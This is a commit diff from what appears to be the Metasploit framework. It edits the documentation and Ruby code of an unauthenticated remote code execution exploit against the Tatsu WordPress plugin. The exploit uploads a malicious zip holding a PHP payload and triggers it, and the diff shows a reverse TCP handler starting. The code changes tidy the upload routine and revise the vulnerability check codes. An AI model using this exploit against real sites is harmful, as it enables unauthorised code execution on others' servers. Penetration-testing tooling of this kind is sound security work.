Addressing comments

msutovsky-r7 · msutovsky-r7 · commit 3abe9b46c014 · 2025-06-13T10:32:39.000+02:00
diff --git a/documentation/modules/exploit/multi/http/wp_tatsu_rce.md b/documentation/modules/exploit/multi/http/wp_tatsu_rce.md
@@ -1,6 +1,9 @@
 ## Vulnerable Application
 
-This module exploits unauthenticated remote code execution in Tatsu plugin for Wordpress. The vulnerable version is below 3.3.11. The module upload malicious zip file containing PHP payload, which gets parsed and unzipped into Wordpress upload directory. Then module will trigger the payload by sending request with payload directory as URI. The vulnerable plugin is available [here](https://tatsubuilder.com/wp-content/uploads/edd/2022/03/tatsu-3.3.11.zip) 
+This module exploits unauthenticated remote code execution in Tatsu plugin for Wordpress. The vulnerable version is below 3.3.11. 
+The module upload malicious zip file containing PHP payload, which gets parsed and unzipped into Wordpress upload directory. 
+Then module will trigger the payload by sending request with payload directory as URI. The vulnerable plugin is available [here](https://tatsubuilder.com/wp-content/uploads/edd/2022/03/tatsu-3.3.11.zip) 
+
 
 ## Verification Steps
 
@@ -53,8 +56,14 @@ volumes:
 ## Options
 
 
+## Scenarios
+
+Vulnerable version is <= 3.3.11.
+
 ### Version and OS
 
+Vulnerable version is <= 3.3.11.
+
 ```
 `msf6 exploit(multi/http/wp_tatsu_rce) > run
 [*] Started reverse TCP handler on 192.168.168.128:4444 
diff --git a/modules/exploits/multi/http/wp_tatsu_rce.rb b/modules/exploits/multi/http/wp_tatsu_rce.rb
@@ -62,9 +62,6 @@ def create_zip
 
   def upload_malicious_zip
     zip_payload = create_zip
-    post_data = Rex::MIME::Message.new
-    post_data.add_part('add_custom_font', nil, nil, 'form-data; name="action"')
-    post_data.add_part(zip_payload, nil, nil, %(form-data; name="file"; filename="#{Rex::Text.rand_text_alphanumeric(12)}.zie"))
 
     boundary = Rex::Text.rand_text_alphanumeric(32).to_s
 
@@ -116,13 +113,13 @@ def check
 
     changelog_body = res.body
 
-    return CheckCode::Detected('Could not find tatsu plugin') if changelog_body.blank?
+    return CheckCode::Safe('Could not find tatsu plugin') if changelog_body.blank?
 
-    return CheckCode::Safe('Failed to get version') unless changelog_body.match(/v(\d\d?.\d\d?.\d\d?)/)
+    return CheckCode::Detected('Tatsu plugin detected but it failed to get version') unless changelog_body.match(/v(\d\d?.\d\d?.\d\d?)/)
 
     version = Rex::Version.new(Regexp.last_match(1))
 
-    return CheckCode::Vulnerable("Found version #{version}") if version <= Rex::Version.new('3.3.11')
+    return CheckCode::Appears("Found version #{version}") if version <= Rex::Version.new('3.3.11')
 
     return CheckCode::Safe('Patched version detected')
   end
